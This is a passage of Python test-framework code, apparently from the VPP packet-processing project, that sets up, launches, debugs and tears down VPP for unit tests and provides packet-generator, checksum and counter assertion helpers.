return tag in cls.test_tags
except AttributeError:
pass
return False
@classmethod
def is_tagged_run_solo(cls):
""" if the test case class is timing-sensitive - return true """
return cls.has_tag(TestCaseTag.RUN_SOLO)
@classmethod
def skip_fixme_asan(cls):
""" if @tag_fixme_asan & ASan is enabled - mark for skip """
if cls.has_tag(TestCaseTag.FIXME_ASAN):
vpp_extra_cmake_args = os.environ.get('VPP_EXTRA_CMAKE_ARGS', '')
if 'DVPP_ENABLE_SANITIZE_ADDR=ON' in vpp_extra_cmake_args:
cls = unittest.skip("Skipping @tag_fixme_asan tests")(cls)
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
cls.debug_attach = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
elif dl == "attach":
cls.debug_attach = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@classmethod
def get_vpp_worker_count(cls):
if not hasattr(cls, "vpp_worker_count"):
if cls.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
cls.vpp_worker_count = 0
else:
cls.vpp_worker_count = config.vpp_worker_count
return cls.vpp_worker_count
@classmethod
def get_cpus_required(cls):
return 1 + cls.get_vpp_worker_count()
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = config.step
cls.plugin_path = ":".join(config.vpp_plugin_dir)
cls.test_plugin_path = ":".join(config.vpp_test_plugin_dir)
cls.extern_plugin_path = ":".join(config.extern_plugin_dir)
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
size = re.search(r"\d+[gG]", config.coredump_size)
if size:
coredump_size = f"coredump-size {config.coredump_size}".lower()
else:
coredump_size = "coredump-size unlimited"
default_variant = config.variant
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = config.api_fuzz
if api_fuzzing is None:
api_fuzzing = 'off'
cls.vpp_cmdline = [
config.vpp,
"unix", "{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}",
"api-segment", "{", "prefix", cls.get_api_segment_prefix(), "}",
"cpu", "{", "main-core", str(cls.cpus[0]), ]
if cls.extern_plugin_path not in (None, ""):
cls.extra_vpp_plugin_config.append(
"add-path %s" % cls.extern_plugin_path)
if cls.get_vpp_worker_count():
cls.vpp_cmdline.extend([
"corelist-workers", ",".join([str(x) for x in cls.cpus[1:]])])
cls.vpp_cmdline.extend([
"}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.get_stats_sock_path(),
cls.extra_vpp_statseg_config, "}",
"socksvr", "{", "socket-name", cls.get_api_sock_path(), "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins", "{", "plugin", "dpdk_plugin.so", "{", "disable", "}",
"plugin", "rdma_plugin.so", "{", "disable", "}",
"plugin", "lisp_unittest_plugin.so", "{", "enable", "}",
"plugin", "unittest_plugin.so", "{", "enable", "}"
] + cls.extra_vpp_plugin_config + ["}", ])
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if not cls.debug_attach:
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print(f"sudo gdb {config.vpp} "
f"-ex 'target remote localhost:{cls.gdbserver_port}'")
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print(f"sudo gdb {config.vpp} -ex 'attach {cls.vpp.pid}'")
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def attach_vpp(cls):
cls.vpp = DummyVpp()
@classmethod
def run_vpp(cls):
cls.logger.debug(f"Assigned cpus: {cls.cpus}")
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or\
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def get_stats_sock_path(cls):
return "%s/stats.sock" % cls.tempdir
@classmethod
def get_api_sock_path(cls):
return "%s/api.sock" % cls.tempdir
@classmethod
def get_api_segment_prefix(cls):
return os.path.basename(cls.tempdir) # Only used for VAPI
@classmethod
def get_tempdir(cls):
if cls.debug_attach:
tmpdir = f"{config.tmp_dir}/unittest-attach-gdb"
else:
tmpdir = f"{config.tmp_dir}/vpp-unittest-{cls.__name__}"
if config.wipe_tmp_dir:
shutil.rmtree(tmpdir, ignore_errors=True)
os.mkdir(tmpdir)
return tmpdir
@classmethod
def create_file_handler(cls):
if config.log_dir is None:
cls.file_handler = FileHandler(f"{cls.tempdir}/log.txt")
return
logdir = f"{config.log_dir}/vpp-unittest-{cls.__name__}"
if config.wipe_tmp_dir:
shutil.rmtree(logdir, ignore_errors=True)
os.mkdir(logdir)
cls.file_handler = FileHandler(f"{logdir}/log.txt")
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
cls.logger = get_logger(cls.__name__)
random.seed(config.rnd_seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
cls.set_debug_flags(config.debug)
cls.tempdir = cls.get_tempdir()
cls.create_file_handler()
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" % cls.__name__)
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, api socket is %s",
cls.tempdir, cls.get_api_sock_path())
cls.logger.debug("Random seed is %s", config.rnd_seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._pcaps = []
cls._old_pcaps = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
if cls.debug_attach:
cls.attach_vpp()
else:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, config.vpp)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
if not cls.debug_attach:
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver or cls.debug_attach:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.__name__, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.get_stats_sock_path())
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except (vpp_papi.VPPIOError, Exception) as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise e
if cls.debug_attach:
last_line = cls.vapi.cli("show thread").split("\n")[-2]
cls.vpp_worker_count = int(last_line.split(" ")[0])
print("Detected VPP with %s workers." % cls.vpp_worker_count)
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise e
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise e
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if not cls.debug_attach and cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
try:
outs, errs = cls.vpp.communicate(timeout=5)
except subprocess.TimeoutExpired:
cls.vpp.kill()
outs, errs = cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
if not cls.debug_attach:
cls.vpp.stdout.close()
cls.vpp.stderr.close()
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if config.debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace max 1000"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.statistics.set_errors_str())
self.logger.info(self.vapi.ppcli("show run"))
self.logger.info(self.vapi.ppcli("show log"))
self.logger.info(self.vapi.ppcli("show bihash"))
self.logger.info("Logging testcase specific show commands.")
self.show_commands_at_teardown()
if self.remove_configured_vpp_objects_on_tear_down:
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
m = self._testMethodName
api_trace = "vpp_api_trace.%s.%d.log" % (m, self.vpp.pid)
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
except VppTransportSocketIOError:
self.logger.debug("VppTransportSocketIOError: Vpp dead. "
"Cannot log show commands.")
self.vpp_dead = True
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
super(VppTestCase, self).setUp()
self.reporter.send_keep_alive(self)
if self.vpp_dead:
raise VppDiedError(rv=None, testcase=self.__class__.__name__,
method_name=self._testMethodName)
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_pcap(cls, intf, worker):
""" Register a pcap in the testclass """
# add to the list of captures with current timestamp
cls._pcaps.append((intf, worker))
@classmethod
def get_vpp_time(cls):
# processes e.g. "Time now 2.190522, Wed, 11 Mar 2020 17:29:54 GMT"
# returns float("2.190522")
timestr = cls.vapi.cli('show clock')
head, sep, tail = timestr.partition(',')
head, sep, tail = head.partition('Time now')
return float(tail)
@classmethod
def sleep_on_vpp_time(cls, sec):
""" Sleep according to time in VPP world """
# On a busy system with many processes
# we might end up with VPP time being slower than real world
# So take that into account when waiting for VPP to do something
start_time = cls.get_vpp_time()
while cls.get_vpp_time() - start_time < sec:
cls.sleep(0.1)
@classmethod
def pg_start(cls, trace=True):
""" Enable the PG, wait till it is done, then clean up """
for (intf, worker) in cls._old_pcaps:
intf.handle_old_pcap_file(intf.get_in_path(worker),
intf.in_history_counter)
cls._old_pcaps = []
if trace:
cls.vapi.cli("clear trace")
cls.vapi.cli("trace add pg-input 1000")
cls.vapi.cli('packet-generator enable')
# PG, when starts, runs to completion -
# so let's avoid a race condition,
# and wait a little till it's done.
# Then clean it up - and then be gone.
deadline = time.time() + 300
while cls.vapi.cli('show packet-generator').find("Yes") != -1:
cls.sleep(0.01) # yield
if time.time() > deadline:
cls.logger.error("Timeout waiting for pg to stop")
break
for intf, worker in cls._pcaps:
cls.vapi.cli('packet-generator delete %s' %
intf.get_cap_name(worker))
cls._old_pcaps = cls._pcaps
cls._pcaps = []
@classmethod
def create_pg_interfaces_internal(cls, interfaces, gso=0, gso_size=0,
mode=None):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i, gso, gso_size, mode)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_pg_ip4_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_IP4)
@classmethod
def create_pg_ip6_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_IP6)
@classmethod
def create_pg_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_ETHERNET)
@classmethod
def create_pg_ethernet_interfaces(cls, interfaces, gso=0, gso_size=0):
pgmode = VppEnum.vl_api_pg_interface_mode_t
return cls.create_pg_interfaces_internal(interfaces, gso, gso_size,
pgmode.PG_API_MODE_ETHERNET)
@classmethod
def create_loopback_interfaces(cls, count):
"""
Create loopback interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppLoInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.lo_interfaces = result
return result
@classmethod
def create_bvi_interfaces(cls, count):
"""
Create BVI interfaces.
:param count: number of interfaces created.
:returns: List of created interfaces.
"""
result = [VppBviInterface(cls) for i in range(count)]
for intf in result:
setattr(cls, intf.name, intf)
cls.bvi_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend // len(padding)) + 1
packet[Raw].load += (padding * num)[:extend].encode("ascii")
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
# retrieve payload, currently 18 bytes (4 x ints + 1 short)
return pack('iiiih', info.index, info.src,
info.dst, info.ip, info.proto)
@staticmethod
def payload_to_info(payload, payload_field='load'):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:type payload: <class 'scapy.packet.Raw'>
:param payload_field: packet fieldname of payload "load" for
<class 'scapy.packet.Raw'>
:type payload_field: str
:returns: _PacketInfo object containing de-serialized data from payload
"""
# retrieve payload, currently 18 bytes (4 x ints + 1 short)
payload_b = getattr(payload, payload_field)[:18]
info = _PacketInfo()
info.index, info.src, info.dst, info.ip, info.proto \
= unpack('iiiih', payload_b)
# some SRv6 TCs depend on get an exception if bad values are detected
if info.index > 0x4000:
raise ValueError('Index value is invalid')
return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_counter_equal(self, counter, expected_value,
thread=None, index=0):
c = self.get_counter(counter)
if thread is not None:
c = c[thread][index]
else:
c = sum(x[index] for x in c)
self.assert_equal(c, expected_value, "counter `%s'" % counter)
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics[counter].sum()
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def virtual_sleep(self, timeout, remark=None):
self.logger.debug("Moving VPP time by %s (%s)", timeout, remark)
self.vapi.cli("set clock adjust %s" % timeout)
def pg_send(self, intf, pkts, worker=None, trace=True):
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start(trace=trace)
def snapshot_stats(self, stats_diff):
"""Return snapshot of interesting stats based on diff dictionary."""
stats_snapshot = {}
for sw_if_index in stats_diff:
for counter in stats_diff[sw_if_index]:
stats_snapshot[counter] = self.statistics[counter]
self.logger.debug(f"Took statistics stats_snapshot: {stats_snapshot}")
return stats_snapshot
def compare_stats_with_snapshot(self, stats_diff, stats_snapshot):
"""Assert appropriate difference between current stats and snapshot."""
for sw_if_index in stats_diff:
for cntr, diff in stats_diff[sw_if_index].items():
if sw_if_index == "err":
self.assert_equal(
self.statistics[cntr].sum(),
stats_snapshot[cntr].sum() + diff,
f"'{cntr}' counter value (previous value: "
f"{stats_snapshot[cntr].sum()}, "
f"expected diff: {diff})")
else:
try:
self.assert_equal(
self.statistics[cntr][:, sw_if_index].sum(),
stats_snapshot[cntr][:, sw_if_index].sum() + diff,
f"'{cntr}' counter value (previous value: "
f"{stats_snapshot[cntr][:, sw_if_index].sum()}, "
f"expected diff: {diff})")
except IndexError:
# if diff is 0, then this most probably a case where
# test declares multiple interfaces but traffic hasn't
# passed through this one yet - which means the counter
# value is 0 and can be ignored
if 0 != diff:
raise
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None,
stats_diff=None, trace=True, msg=None):
if stats_diff:
stats_snapshot = self.snapshot_stats(stats_diff)
self.pg_send(intf, pkts)
try:
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.assert_nothing_captured(timeout=timeout, remark=remark)
timeout = 0.1
finally:
if trace:
if msg:
self.logger.debug(f"send_and_assert_no_replies: {msg}")
self.logger.debug(self.vapi.cli("show trace"))
if stats_diff:
self.compare_stats_with_snapshot(stats_diff, stats_snapshot)
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None,
trace=True, msg=None, stats_diff=None):
if stats_diff:
stats_snapshot = self.snapshot_stats(stats_diff)
if not n_rx:
n_rx = 1 if isinstance(pkts, Packet) else len(pkts)
self.pg_send(intf, pkts, worker=worker, trace=trace)
rx = output.get_capture(n_rx)
if trace:
if msg:
self.logger.debug(f"send_and_expect: {msg}")
self.logger.debug(self.vapi.cli("show trace"))
if stats_diff:
self.compare_stats_with_snapshot(stats_diff, stats_snapshot)
return rx
def send_and_expect_load_balancing(self, input, pkts, outputs,
worker=None, trace=True):
self.pg_send(input, pkts, worker=worker, trace=trace)
rxs = []
for oo in outputs:
rx = oo._get_capture(1)
self.assertNotEqual(0, len(rx))
rxs.append(rx)
if trace:
self.logger.debug(self.vapi.cli("show trace"))
return rxs
def send_and_expect_some(self, intf, pkts, output,
worker=None,
trace=True):
self.pg_send(intf, pkts, worker=worker, trace=trace)
rx = output._get_capture(1)
if trace:
self.logger.debug(self.vapi.cli("show trace"))
self.assertTrue(len(rx) > 0)
self.assertTrue(len(rx) < len(pkts))
return rx
